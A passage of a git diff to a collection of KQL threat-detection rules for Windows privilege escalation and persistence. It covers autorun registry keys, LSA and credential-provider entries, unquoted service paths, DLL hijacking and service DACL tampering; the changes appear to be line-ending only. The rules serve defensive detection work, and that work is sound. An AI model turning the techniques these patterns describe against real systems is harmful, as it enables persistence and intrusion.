Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey 
contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/Privilege Escalation/control_panel_items.kql
index 73d6ffb7..74887005 100644
--- a/KQL/rules/Privilege Escalation/control_panel_items.kql
+++ b/KQL/rules/Privilege Escalation/control_panel_items.kql
@@ -1,10 +1,10 @@
-// Title: Control Panel Items
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020-06-22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546
-
-DeviceProcessEvents
+// Title: Control Panel Items
+// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-06-22
+// Level: high
+// Description: Detects the malicious use of a control panel item
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql
index de77d3a8..49be841b 100644
--- a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql
+++ b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql
@@ -1,10 +1,10 @@
-// Title: Created Files by Microsoft Sync Center
-// Author: elhoim
-// Date: 2022-04-28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
-
-DeviceFileEvents
+// Title: Created Files by Microsoft Sync Center
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
index 748895b6..a4d787f2 100644
--- a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
+++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
@@ -1,11 +1,11 @@
-// Title: Creation Exe for Service with Unquoted Path
-// Author: frack113
-// Date: 2021-12-30
-// Level: high
-// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
-// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
-
-DeviceFileEvents
+// Title: Creation Exe for Service with Unquoted Path
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
+// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
index 6d865550..3bec8773 100644
--- a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
+++ b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
@@ -1,10 +1,10 @@
-// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder
-// Author: frack113
-// Date: 2022-05-09
-// Level: medium
-// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-
-DeviceFileEvents
+// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder
+// Author: frack113
+// Date: 2022-05-09
+// Level: medium
+// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
 | where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
index 421bf996..1612837c 100644
--- a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: CurrentControlSet Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: CurrentControlSet Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql
index 78b4aadd..2fe90fd6 100644
--- a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: CurrentVersion Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group 
Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft 
Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath 
contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or 
InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql
index 0d736142..72ecc7e3 100644
--- a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: CurrentVersion NT Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: CurrentVersion NT Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and
(not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
index 202b8146..3ff58c13 100644
--- a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
+++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
@@ -1,12 +1,12 @@
-// Title: Default RDP Port Changed to Non Standard Port
-// Author: frack113
-// Date: 2022-01-01
-// Level: high
-// Description: Detects changes to the default RDP port.
-// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
-// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
-
-DeviceRegistryEvents
+// Title: Default RDP Port Changed to Non Standard Port
+// Author: frack113
+// Date: 2022-01-01
+// Level: high
+// Description: Detects changes to the default RDP port.
+// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
+// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
index 09dc828f..22afb0d3 100644
--- a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
+++ b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
@@ -1,10 +1,10 @@
-// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
-// Author: Jonhnathan Ribeiro, oscd.community
-// Date: 2020-10-16
-// Level: high
-// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
-
-DeviceProcessEvents
+// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
+// Author: Jonhnathan Ribeiro, oscd.community
+// Date: 2020-10-16
+// Level: high
+// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
index 946328a1..1f454f54 100644
--- a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
+++ b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
@@ -1,10 +1,10 @@
-// Title: DHCP Callout DLL Installation
-// Author: Dimitrios Slamaris
-// Date: 2017-05-15
-// Level: high
-// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
-
-DeviceRegistryEvents
+// Title: DHCP Callout DLL Installation
